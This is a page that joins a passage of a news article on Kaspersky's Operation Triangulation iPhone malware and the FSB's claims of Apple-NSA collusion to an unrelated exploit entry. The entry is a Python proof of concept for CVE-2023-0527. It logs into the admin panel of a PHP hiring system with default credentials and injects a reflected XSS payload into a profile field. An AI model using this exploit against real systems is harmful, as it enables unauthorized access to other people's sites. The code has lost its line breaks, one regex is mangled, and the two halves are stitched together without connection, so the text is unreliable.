“The security of iOS, once breached, makes it really challenging to detect these attacks,” says Wardle, who was formerly an NSA staffer. At the same time, he adds that attackers would need to assume any brazen campaign to target Kaspersky would eventually be discovered. “In my opinion, this would be sloppy for an NSA attack,” he says. “But it shows that either hacking Kaspersky was incredibly valuable for the attacker or that whoever this was likely has other iOS zero days as well. If you only have one exploit, you’re not going to risk your only iOS remote attack to hack Kaspersky.”

The NSA declined WIRED’s request for comment on either the FSB announcement or Kaspersky’s findings.

With the release of iOS 16 in September 2022, Apple introduced a special security setting for the mobile operating system known as Lockdown Mode that intentionally restricts usability and access to features that can be porous within services like iMessage and Apple’s WebKit. It is not known whether Lockdown Mode would have prevented the attacks Kaspersky observed.

The Russian government’s purported discovery of Apple’s collusion with US intelligence “testifies to the close cooperation of the American company Apple with the national intelligence community, in particular the US NSA, and confirms that the declared policy of ensuring the confidentiality of personal data of users of Apple devices is not true,” claims an FSB statement, which adds that it would allow the NSA and “partners in anti-Russian activities” to target “any person of interest to the White House,” as well as US citizens.

The FSB statement wasn’t accompanied by any technical details of the described NSA spy campaign, or any evidence that Apple colluded in it.

Apple has historically resisted pressure to provide a “backdoor” or other vulnerability to US law enforcement or intelligence agencies. That stance was demonstrated most publicly in Apple’s high-profile 2016 showdown with the FBI over the bureau’s demand that Apple assist in the decryption of an iPhone used by San Bernadino mass shooter Syed Rizwan Farook. The standoff only ended when the FBI found its own method of accessing the iPhone’s storage with the help of Australian cybersecurity firm Azimuth.

Despite its announcement coming on the same day as the FSB’s claims, Kaspersky has so far made no claims that the Operation Triangulation hackers who targeted the company were working on behalf of the NSA. Nor has the cybersecurity firm attributed the hacking to the Equation Group, Kaspersky’s name for the state-sponsored hackers it has previously tied to highly sophisticated malware, including Stuxnet and Duqu, tools widely believed to have been created and deployed by the NSA and US allies.

Kaspersky did say in a statement to WIRED that, “Given the sophistication of the cyberespionage campaign and the complexity of analysis of the iOS platform, further research will surely reveal more details on the matter.”

US intelligence agencies and US allies would, of course, have plenty of reason to want to look over Kaspersky’s shoulder. Aside from years of warnings from the US government that Kaspersky has ties to the Russian government, the company’s researchers have long demonstrated their willingness to track and expose hacking campaigns conducted by Western governments that Western cybersecurity firms don’t. In 2015, in fact, Kaspersky revealed that its own network had been breached by hackers who used a variant of the Duqu malware, suggesting a link to the Equation Group—and thus potentially the NSA.

That history, combined with the sophistication of the malware that targeted Kaspersky, suggests that as wild as the FSB’s claims may be, there’s good reason to imagine that Kaspersky’s intruders could have ties to a government. But if you hack one of the world’s most prolific trackers of state-sponsored hackers—even with seamless, tough-to-detect iPhone malware—you can expect, sooner or later, to get caught.

Kaspersky Says New Zero-Day Malware Hit iPhones—Including Its Own

Online Security Guards Hiring System version 1.0 suffers from a cross site scripting vulnerability.

    #Exploit Title: Online Security Guards Hiring System 1.0 – REFLECTED XSS #Google Dork : NA#Date: 23-01-2023#Exploit Author : AFFAN AHMED#Vendor Homepage: https://phpgurukul.com#Software Link: https://phpgurukul.com/projects/Online-Security-Guard-Hiring-System_PHP.zip#Version: 1.0#Tested on: Windows 11 + XAMPP + PYTHON-3.X#CVE : CVE-2023-0527#NOTE: TO RUN THE PROGRAM FIRST SETUP THE CODE WITH XAMPP AND THEN RUN THE BELOW PYTHON CODE TO EXPLOIT IT# Below code check for both the parameter /admin-profile.php and in /search.php#POC-LINK: https://github.com/ctflearner/Vulnerability/blob/main/Online-Security-guard-POC.mdimport requests import re from colorama import Foreprint(Fore.YELLOW + "######################################################################" + Fore.RESET)print(Fore.RED + "# TITLE: Online Security Guards Hiring System v1.0" + Fore.RESET)print(Fore.RED + "# VULNERABILITY-TYPE : CROSS-SITE SCRIPTING (XSS)" + Fore.RESET)print(Fore.RED + "# VENDOR OF THE PRODUCT : PHPGURUKUL" + Fore.RESET)print(Fore.RED + "# AUTHOR : AFFAN AHMED" + Fore.RESET)print(Fore.YELLOW +"######################################################################" + Fore.RESET)print()print(Fore.RED+"NOTE: To RUN THE CODE JUST TYPE : python3 exploit.py"+ Fore.RESET)print()# NAVIGATING TO ADMIN LOGIN PAGEWebsite_url = "http://localhost/osghs/admin/login.php"    # CHANGE THE URL ACCORDING TO YOUR SETUPprint(Fore.RED+"----------------------------------------------------------------------"+ Fore.RESET)print(Fore.CYAN + "[**] Inserting the Username and Password in the Admin Login Form [**]" + Fore.RESET)print(Fore.RED+"----------------------------------------------------------------------"+Fore.RESET)Admin_login_credentials = {'username': 'admin', 'password': 'Test@123', 'login': ''}headers = {    'Content-Type': 'application/x-www-form-urlencoded',    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36',    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',    'Referer': 'http://localhost/osghs/admin/login.php',    'Accept-Encoding': 'gzip, deflate',    'Accept-Language': 'en-US,en;q=0.9',    'Connection': 'close',    'Cookie': 'PHPSESSID=8alf0rbfjmhm3ddra7si0cv7qc',    'Sec-Fetch-Site': 'same-origin',    'Sec-Fetch-Mode': 'navigate',    'Sec-Fetch-User': '?1',    'Sec-Fetch-Dest': 'document'}response = requests.request("POST", Website_url, headers=headers, data = Admin_login_credentials)if response.status_code == 200:    location = re.findall(r'document.location =\'(.*?)\'',response.text)    if location:        print(Fore.GREEN + "> Login Successful into Admin Account"+Fore.RESET)        print(Fore.GREEN + "> Popup:"+ Fore.RESET,location )    else:        print(Fore.GREEN + "> document.location not found"+ Fore.RESET)else:    print(Fore.GREEN + "> Error:", response.status_code + Fore.RESET)print(Fore.RED+"----------------------------------------------------------------------"+ Fore.RESET)print(Fore.CYAN + " [**] Trying XSS-PAYLOAD in Admin-Name Parameter  [**]" + Fore.RESET)# NAVIGATING TO ADMIN PROFILE SECTION  TO UPDATE ADMIN PROFILE # INSTEAD OF /ADMIN-PROFILE.PHP REPLACE WITH /search.php TO FIND XSS IN SEARCH PARAMETERWebsite_url= "http://localhost/osghs/admin/admin-profile.php"   # CHANGE THIS URL ACCORDING TO YOUR PREFERENCE# FOR CHECKING XSS IN ADMIN-PROFILE USE THE BELOW PAYLOAD# FOR CHECKING XSS IN SEARCH.PHP SECTION REPLACE EVERYTHING AND PUT searchdata=<your-xss-payload>&search=""payload = {    "adminname": "TESTAdmin<script>alert(\"From-Admin-Name\")</script>",      # XSS-Payload , CHANGE THIS ACCORDING TO YOUR PREFERENCE    "username": "admin",                                                      # THESE DETAILS ARE RANDOM , CHANGE IT TO YOUR PREFERENCE    "mobilenumber": "8979555558",    "email": "admin@gmail.com",    "submit": "",}# SENDING THE RESPONSE WITH POST REQUESTresponse = requests.post(Website_url, headers=headers, data=payload)print(Fore.RED+"----------------------------------------------------------------------"+ Fore.RESET)# CHECKING THE STATUS CODE 200 AND ALSO FINDING THE SCRIPT TAG WITH THE HELP OF REGEX if response.status_code == 200:    scripts = re.findall(r'<script>alert$.*?$</script>', response.text)    print(Fore.GREEN + "> Response After Executing the Payload at adminname parameter : "+ Fore.RESET)     print(Fore.GREEN+">"+Fore.RESET,scripts)exploit.pyDisplaying exploit.py.

Tag

#apple